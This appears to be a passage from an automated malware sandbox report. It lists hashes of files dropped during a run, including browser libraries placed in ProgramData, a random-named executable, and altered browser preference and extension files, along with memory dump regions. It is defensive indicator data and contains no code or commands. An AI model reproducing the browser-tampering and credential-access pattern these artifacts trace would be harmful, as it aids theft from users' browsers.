| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
memory/3468-547-0x0000000010000000-0x00000000105E5000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | d0c46cad6c0778401e21910bd6b56b70 |
| SHA1 | 7be418951ea96326aca445b8dfe449b2bfa0dca6 |
| SHA256 | 9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02 |
| SHA512 | 057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 6e16cb58868b61355792e97f41c3a3bd |
| SHA1 | 6974bacdc2bec1aa77da848fcfaf284d9c6c2f03 |
| SHA256 | 2a2752458bb946e949091f36d6c5fd0050cb8ce26321261edbbc1eed0ff663c5 |
| SHA512 | 8fec22ca5348276a2c6829fdf5eaf223978bf2d59e041a5b23e598ccb3b53048d335047403ba04acd9a52ad2b0289b2dc44d5281f3104bf56b8da11bc699a381 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 64c07c3adcbba062ccf36954a2b1678f |
| SHA1 | 21205e8290bf66a84a6527703f4102d5d21505f0 |
| SHA256 | 20261ea4655819135f13e6ad24248ca4a44242407e42cc7eba709af43f168024 |
| SHA512 | 1f71b5bedb9c9ac8c756ef2e8e1c2efc752680be541207c2e1b7777cb97629d22a6e45e4a7017792df9dccc815371a8c6446a88a888d36856a823ecef989fe26 |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
memory/3396-584-0x0000000000400000-0x0000000000930000-memory.dmp
memory/4996-585-0x0000000000400000-0x0000000000ECD000-memory.dmp
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
memory/4568-588-0x0000000000400000-0x0000000000ECD000-memory.dmp
C:\ProgramData\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe
| MD5 | b119ea556def66eaa9f751a650b45af0 |
| SHA1 | daf3fa0325b110183d0a233b4b0d1875f0b49ca8 |
| SHA256 | 53c38771ea9986f418a48d89e4df5e82c84f1e71a4c242fc6e6ae3ba934cf6d4 |
| SHA512 | 08dd919ce39af698051b4f156faa8d155c41cc0de3412ef152dc6e90cbdd5cb50109f57c47555925fd6d18816411b1c510ac642b9576f5f28540be8695ed46c4 |
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
memory/2544-663-0x0000000010000000-0x00000000105E5000-memory.dmp
memory/1164-712-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/1308-716-0x0000000000400000-0x0000000000AEA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\KECFIDGCBF.exe
| MD5 | fe380780b5c35bd6d54541791151c2be |
| SHA1 | 7fe3a583cf91474c733f85cebf3c857682e269e1 |
| SHA256 | b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53 |
| SHA512 | ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 140ab875ddd8070850d39a110f09c994 |
| SHA1 | ec6a4ef7dd95a5801a7f1f332d6a56cc59a55e5e |
| SHA256 | ba6365f59d3352eda0503dff3dbc69fac753fb5ef3b9e5fbd267fa0401af99aa |
| SHA512 | dfc4012c214d7f58cc599780af74d89b4585999e10140e9edcf048f477d882e82abbe4f756156bfd2e8be181ba7d52023bd2a2ac4832fb691c27a3114fc4f49a |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 9214253cb512ae9bba9e749ed3e4ef80 |
| SHA1 | 72fad7b16cd7e917fbd12cd45c60e9eceb58cc50 |
| SHA256 | 0472bb5d076b1df58e2b3de254946cc4f59247d246e057b612cf24a2436ccb9d |
| SHA512 | e28aeed4b6d3a4feed97f0e70d66c8c7e04d1daeb0704674e022b67105897fb549020af5bab745a6469dd3a531283d47b83cf67bb2a6bb000aa8d455a71c0cad |
memory/3396-755-0x0000000000400000-0x0000000000930000-memory.dmp
memory/1664-769-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/684-770-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/1332-772-0x0000000000400000-0x0000000000ECD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\opera_package
| MD5 | 856c0e24f5ee9715ee77bd4fef0995ae |
| SHA1 | 02b109c418bfdee0fc725faa35f8c45ae0725929 |
| SHA256 | 74e4528ae1db501f4f5f714aead1a052b8d20cf30167ca6218f5718601e85ff1 |
| SHA512 | 242d571acb0b2c35a7272a3e739ab707242cbe17109dc14bc86de38a238238539f867842ea242ba4122f657e033abe4210c107582bbf49ab47f0e9c267e6f6ff |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | c9a45240205b45855e8f8a60a015bf03 |
| SHA1 | 210f84c5a47079ca4f0566ab48c75ae261c94e92 |
| SHA256 | ef786036b39d9860075c0b2a73259eb133e2a101610f567805d65e51e431c18b |
| SHA512 | f4c48221bb4dc03f0634616a654a064d20e21396512204493effe3b00053cc63712d73d4bebe609e8e87125d696903ef80d7a387c58a2f02e61a3ed9e2f8eb58 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
| MD5 | 20d293b9bf23403179ca48086ba88867 |
| SHA1 | dedf311108f607a387d486d812514a2defbd1b9e |
| SHA256 | fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348 |
| SHA512 | 5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\assistant_installer.exe
| MD5 | b3f05009b53af6435e86cfd939717e82 |
| SHA1 | 770877e7c5f03e8d684984fe430bdfcc2cf41b26 |
| SHA256 | 3ea8d40fcede1fc03e5603246d75d13e8d44d7229d4c390c39a55534053027f7 |
| SHA512 | d2dee80aaa79b19f1eb1db85079a05f621780e06bfea9e838b62d757ba29399f9090ec7c6ff553377c9b712f3ba8dd812cdff39f3e28829928e86746a8ac6b27 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\dbgcore.dll
| MD5 | 8b6f64e5d3a608b434079e50a1277913 |
| SHA1 | 03f431fabf1c99a48b449099455c1575893d9f32 |
| SHA256 | 926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2 |
| SHA512 | c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421251\assistant\dbghelp.dll
| MD5 | 925ea07f594d3fce3f73ede370d92ef7 |
| SHA1 | f67ea921368c288a9d3728158c3f80213d89d7c2 |
| SHA256 | 6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9 |
| SHA512 | a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2 |
memory/1664-982-0x0000000000400000-0x0000000000ECD000-memory.dmp
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | 89c2a94df354a29913560ef53189e092 |
| SHA1 | 4477a31ffe2e939095ea90a88e05ecdf8650a737 |
| SHA256 | da71b13da1ad50a22f0551a684c7109c85374f4229c899e836593547e61d1cae |
| SHA512 | 691df3fe4465a29761cf1b785c527a3b5b6534cab913ae1f61a4c5c7a28f05664efdffdb4a9d5e1d21c129bfc29c74a8728e501efb91cc0b153b57bdfe8e307c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
| MD5 | bd6b60b18aee6aaeb83b35c68fb48d88 |
| SHA1 | 9b977a5fbf606d1104894e025e51ac28b56137c3 |
| SHA256 | b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55 |
| SHA512 | 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\8ypl8oso.default-release\prefs.js
| MD5 | 69ca8f42985dc9c86e54eeede099b62c |
| SHA1 | 12c178a2c440a090f5f0249cddf403a2f8ad2b16 |
| SHA256 | 7c26271b93289c9114e277e4bb0bec6bb849d2e6004228272aa35f34edecbe11 |
| SHA512 | 207aea12ad77d1eb1ec509fb564caf4f66d1f454f0bb5683f8a84d6ebad33dcf64581c1a623761e2fdabe03a2595e2492e272d2abae8cf83f3ea2d4023213449 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 7ef0c71cec7f5c6a0c5fe05b36e1ddab |
| SHA1 | e1c04979eb6c825ef5b71f15c38e176150bfaebe |
| SHA256 | 854d3d6ec8ee8fc874b5735b1012d6931d8d0c9c4da4c87b8a6ec6850adb56fc |
| SHA512 | e1cbee6bd5bb634b6d4ed3ef6d0b082e9abc1f44beef7c10a44a888095f060c796b2962387c87fb139cf4c32fda9080267ae4d1903c3d254e447a3c4f62e8925 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e56656605c6c6b0070f62a2bd88e1631 |
| SHA1 | 047e21e0e3c5347d4f85a4cf2ad609b8711f7c21 |
| SHA256 | e7ea06724c971e90bf55fd8904fd690ee27534e53d6224400560ea374b69aa7c |
| SHA512 | 335c91239da23f988c550c575d883ec7e3673ca03a2af6484a626548b612e12d0e0caf1eaeb5d32a9177cd1afbb22898a03d96fd38fab6ed32957016c35ba43c |
C:\Users\Admin\AppData\Local\Temp\7zS83D6.tmp\__data__\config.txt
| MD5 | 390ac3f2b52e0f0d283f9aaf5f6b1661 |
| SHA1 | 8237596cbd07487c309fb51f424d7b08be11a2b0 |
| SHA256 | 8083b98be75e90531952fc20da8e437f8b5523a3735fb96cfd1eed4e894e39cb |
| SHA512 | 8101f5d56a9b74732715c18146d88338c208ff1cb16498f6f95ba295784e7049f6558af4088f9d4ad99ab9d090cd612b56a837243474396dd0943ea7ed52a632 |